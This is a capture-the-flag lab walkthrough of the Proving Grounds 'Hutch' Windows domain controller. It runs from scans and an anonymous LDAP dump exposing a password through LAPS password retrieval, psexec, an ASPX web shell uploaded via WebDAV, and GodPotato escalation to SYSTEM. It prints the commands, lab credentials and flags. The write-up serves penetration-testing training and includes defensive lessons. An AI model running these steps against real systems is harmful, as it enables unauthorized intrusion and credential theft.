Post

Proving Grounds - Hutch (Windows)

Proving Grounds Hutch Windows walkthrough covering LDAP anonymous enumeration, LAPS password retrieval, and WebDAV shell upload with GodPotato.

Posted
By Paul
4 min read
Proving Grounds - Hutch (Windows)

Overview

Field Value
OS Windows (Server 2019)
Difficulty Not specified
Attack Surface LDAP, IIS with WebDAV, Active Directory
Primary Entry Vector LDAP anonymous dump -> cleartext password in description field
Privilege Escalation Path LAPS ms-Mcs-AdmPwd retrieval -> psexec SYSTEM / WebDAV shell + GodPotato

Credentials

1
2

fmcsorley       CrabSharkJellyfish192
administrator   jS+6#%Dk+00]00  (via LAPS)

Reconnaissance

💡 Why this works This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

1

rustscan -a $ip -r 1-65535 --ulimit 5000

1
2
3
4
5
6
7
8
9

Open 192.168.198.122:53
Open 192.168.198.122:80
Open 192.168.198.122:88
Open 192.168.198.122:135
Open 192.168.198.122:139
Open 192.168.198.122:389
Open 192.168.198.122:445
Open 192.168.198.122:5985
Open 192.168.198.122:9389

1
2
3
4
5
6
7
8
9
10
11
12
13
14

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec)
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing

SMB anonymous login returned no shares. RPC was denied. However, LDAP anonymous bind with a full base DN dump returned all domain objects:

1

ldapsearch -x -H ldap://$ip -b "DC=hutch,DC=offsec" -s sub "(objectclass=*)" > ldap_dump.txt

1
2

cat ldap_dump.txt | grep -i pass
description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.

The password was found in the description attribute of user fmcsorley (Freddy McSorley).

Initial Foothold

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

With the LDAP-obtained credentials, authenticated LDAP queries revealed LAPS (ms-Mcs-AdmPwd) was readable for the local administrator:

1
2

ldapsearch -x -H ldap://$ip -D "fmcsorley@hutch.offsec" -w 'CrabSharkJellyfish192' \
  -b "DC=hutch,DC=offsec" "(objectclass=computer)" ms-Mcs-AdmPwd

This returned the local administrator password. Using psexec with the admin credentials:

1

impacket-psexec 'hutch.offsec/administrator:jS+6#%Dk+00]00@'$ip

1
2
3
4
5

[*] Requesting shares on 192.168.198.122.....
[*] Found writable share ADMIN$
[*] Opening SVCManager on 192.168.198.122.....
C:\Windows\system32> whoami
nt authority\system

1
2

c:\Users\fmcsorley\Desktop> type local.txt
1dc76d8ad78f9e8711b704ca742ce7db

💡 Why this works The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation

The psexec approach provided a direct SYSTEM shell. As an alternative privilege escalation path, WebDAV on IIS allowed uploading an ASPX web shell:

1
2

curl -u 'hutch.offsec\fmcsorley:CrabSharkJellyfish192' \
  -X PUT http://192.168.198.122/shell.aspx --data-binary @shell.aspx -D -

1

HTTP/1.1 204 No Content

1

curl -sk "http://192.168.198.122/shell.aspx?cmd=whoami"

1

iis apppool\defaultapppool

GodPotato was used to escalate from the IIS app pool identity to SYSTEM:

1

curl -sk "http://192.168.198.122/shell.aspx?cmd=C:\Windows\Temp\GodPotato.exe+-cmd+%22cmd+/c+whoami%22"

1

nt authority\system

1
2

c:\Users\Administrator\Desktop> type proof.txt
b337a9db2cbe88a59254dcb9ef9c557e

💡 Why this works Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.

Lessons Learned / Key Takeaways

  • Never store passwords in LDAP description fields — anonymous LDAP dumps will expose them.
  • LAPS (ms-Mcs-AdmPwd) read permissions should be tightly restricted; a regular domain user should not be able to read the local admin password.
  • WebDAV with PUT enabled on IIS allows unauthenticated (or low-privilege) file upload — disable or restrict WebDAV methods.
  • IIS app pool identities hold SeImpersonatePrivilege by default, enabling potato-family attacks to SYSTEM.

Attack Flow

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

flowchart LR
    subgraph SCAN["🔍 スキャン"]
        direction TB
        S1["Rustscan / Nmap\nPORT: 53/80/88/135/389\n445/5985/9389"]
        S2["HUTCHDC — hutch.offsec\nIIS 10.0 + WebDAV (PUT許可)\nAD DC"]
        S3["SMB匿名 — 共有なし\nRPC — ACCESS_DENIED"]
        S4["LDAP匿名バインド\nユーザー14名列挙\nfmcsorley descriptionにパスワード平文"]
        S1 --> S2 --> S3 --> S4
    end

    subgraph INITIAL["💥 初期侵入"]
        direction TB
        I1["fmcsorley : CrabSharkJellyfish192\nLDAP認証バインド"]
        I2["ms-Mcs-AdmPwd (LAPS)\nadministratorパスワード取得"]
        I3["impacket-psexec\nadministrator@HUTCHDC\nnt authority\\system"]
        I4["📄 local.txt + proof.txt"]
        I1 --> I2 --> I3 --> I4
    end

    subgraph ALT["🔄 代替パス — WebDAV"]
        direction TB
        A1["curl PUT — shell.aspx\nWebDAVアップロード"]
        A2["IIS apppool\\defaultapppool\nWebシェル実行"]
        A3["GodPotato.exe\nnt authority\\system"]
        A1 --> A2 --> A3
    end

    SCAN --> INITIAL
    SCAN --> ALT

    style SCAN fill:#e8eaf6
    style INITIAL fill:#c8e6c9
    style ALT fill:#fff9c4
    style I4 fill:#4caf50
    style A3 fill:#ff9800

References

  • LDAP Anonymous Bind: https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html
  • LAPS (ms-Mcs-AdmPwd): https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html
  • GodPotato: https://github.com/BeichenDream/GodPotato
  • Impacket psexec: https://github.com/fortra/impacket
  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
Proving Grounds, Windows
ldap laps webdav godpotato active-directory iis
This post is licensed under CC BY 4.0 by the author.